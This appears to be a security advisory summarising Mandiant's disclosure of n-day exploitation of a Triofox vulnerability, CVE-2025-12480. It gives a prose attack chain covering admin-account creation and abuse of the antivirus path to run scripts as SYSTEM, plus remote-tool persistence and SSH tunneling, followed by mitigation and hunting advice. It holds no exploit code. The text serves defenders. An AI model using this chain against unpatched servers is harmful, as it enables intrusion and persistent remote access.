Gladinet Triofox n-day exploitation: technical summary and mitigation guidance

Google’s Mandiant Threat Defense recently disclosed active n-day exploitation of a critical vulnerability in Gladinet’s Triofox file-sharing and remote-access platform. The flaw, CVE-2025-12480 (CVSS 9.1), permits unauthenticated access to administration/configuration pages, enabling attackers to create privileged accounts, upload arbitrary payloads, and achieve code execution. Mandiant observed a threat cluster tracked as UNC6485 weaponizing the defect in late August 2025 — after patches were published — demonstrating the real-world risk of slow patching and n-day exploitation.

How the attack works (technical flow)

1. Unauthenticated access — The vulnerability allows an attacker to reach Triofox configuration/setup pages that should be inaccessible after initial setup.

2. Create admin account — Using the setup flow, the attacker creates a new native admin user (e.g., “Cluster Admin”).

3. Abuse antivirus configuration — Triofox permits administrators to specify the path to an antivirus scanner. The attacker sets that path to a malicious batch/script file. Because the configured scanner runs with the Triofox parent process privileges (SYSTEM), invoking it executes the attacker’s script as SYSTEM.

4. Payload delivery & persistence — In Mandiant’s observed campaign the batch script downloaded a Zoho UEMS installer from a remote host and used it to deploy remote access tools (Zoho Assist, AnyDesk). Those tools provided persistent remote access for reconnaissance and follow-on actions.

5. Lateral movement & tunneling — The actors attempted privilege escalation by adding accounts to local/Domain Admins groups and created an encrypted SSH tunnel (Plink/PuTTY) to allow inbound RDP over a tunneled connection.

Observed objectives and TTPs

• Initial foothold via unauthenticated admin pages.

• Privilege escalation to SYSTEM and domain privilege acquisition.

• Use of legitimate remote-support software for stealth and persistence.

• Encrypted tunneling to evade network detections and enable inbound RDP.

Recommended actions (prioritized)

1. Patch immediately — Upgrade Triofox to the fixed version. Treat disclosed Triofox CVEs as high priority.

2. Audit accounts — Review all native and service accounts created recently; remove unexpected admin users.

3. Verify antivirus paths — Ensure Triofox antivirus/scanner configuration points only to validated binaries and cannot be set to arbitrary scripts.

4. Hunt for indicators — Look for new admin accounts, unexpected Zoho/AnyDesk installs, references to centre_report.bat, outbound connections to suspicious IPs, and recent use of Plink/PuTTY.

5. Isolate and remediate — If compromise is suspected, isolate hosts, collect forensic artifacts, rotate credentials, and rebuild from known-good images where necessary.

6. Network controls — Restrict outbound SSH/SSH-like tunnels and block unusual remote-management ports; enforce egress filtering and EDR monitoring.

Final note

This campaign is a reminder that n-day exploitation is a persistent threat: timely patching, rigorous configuration hardening, and proactive account auditing dramatically reduce exposure to such post-disclosure attacks.